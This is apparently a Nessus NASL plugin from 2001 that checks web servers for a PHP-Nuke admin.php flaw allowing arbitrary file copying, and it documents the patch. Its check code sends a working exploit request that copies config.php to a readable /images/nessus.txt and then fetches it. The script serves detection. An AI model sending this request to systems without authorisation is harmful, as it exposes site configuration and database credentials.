if (description)
{
 script_id(10772);
 script_name(english:"PHP-Nuke copying files security vulnerability (admin.php)");
 desc["english"] = "
The remote host seems to be vulnerable to a security problem in 
PHP-Nuke (admin.php). 
The vulnerability is caused by inadequate processing of queries 
by PHP-Nuke's admin.php which enables attackers to copy any file 
off the operating system to anywhere else on the operating system.

Impact:
Every file that the webserver has access to can be read by anyone. 
Furthermore, any file can be overwritten. 
Usernames (used for database access) can be compromised. 
Administrative privileges can be gained by copying sensitive files.

Solution:
Change the following lines in admin.php:
if($upload) 
To:

if (($upload) && ($admintest)) 

Or upgrade to the latest version (Version 5.3 and above).

Risk Factor: High

Additional information:
http://www.securiteam.com/unixfocus/TOBA";

 script_description(english:desc["english"]);
 script_summary(english:"Determine if a remote host is vulnerable to the admin.php vulnerability");
 script_category(ACT_GATHER_INFO);
 script_family(english:"CGI abuses", francais:"Abus de CGI");
 script_copyright(english:"This script is Copyright (C) 2001 SecurITeam");
 script_dependencie("find_service.nes", "no404.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

port = get_kb_item("Services/www");
if (!port) port = 80;

dir[0] = "/";
dir[1] = "/nuke/";
dir[2] = "/demo/";
dir[3] = "/phpnuke/html/";
dir[4] = "/php_nuke/html/";
dir[5] = "/php/";
dir[6] = "/phpnew/";
dir[7] = "/nuke50/";
dir[8] = string(cgibin(), "/");

if (get_port_state(port))
{
 for (i = 0; dir[i] ; i = i + 1)
 {
  url = string(dir[i], "admin.php");
  #display("URL: ", url, "\n");

  if (is_cgi_installed(url))
  {
   #display("CGI found at: ", url, "\n");
   data = string(url, "?upload=1&file=config.php&file_name=nessus.txt&wdir=/images/&userfile=config.php&userfile_name=nessus.txt");

   req = http_get(item:data, port:port);
   soc = open_sock_tcp(port);
   if (soc)
   {
    send(socket:soc, data:req);
    buf = recv(socket:soc, length:1000);

   # display(buf);
    if ("SAFE MODE " >< buf)
    {
     security_note(port);
     exit(0);
    }
    if ("Unable to create " >< buf)
    {
     security_hole(port);
     exit(0);
    }
   }
   close(soc);

   req = http_get(item:"/images/nessus.txt", port:port);
   soc = open_sock_tcp(port);
   if (soc)
   {
    send(socket:soc, data:req);
    buf = recv(socket:soc, length:1000);

    display(buf);

    if (("PHP-NUKE: Web Portal System" >< buf) && (("?php" >< buf) || ("?PHP" >< buf)) )
    {
     security_hole(port);
     exit(0);
    }
   }
  }
 }
}
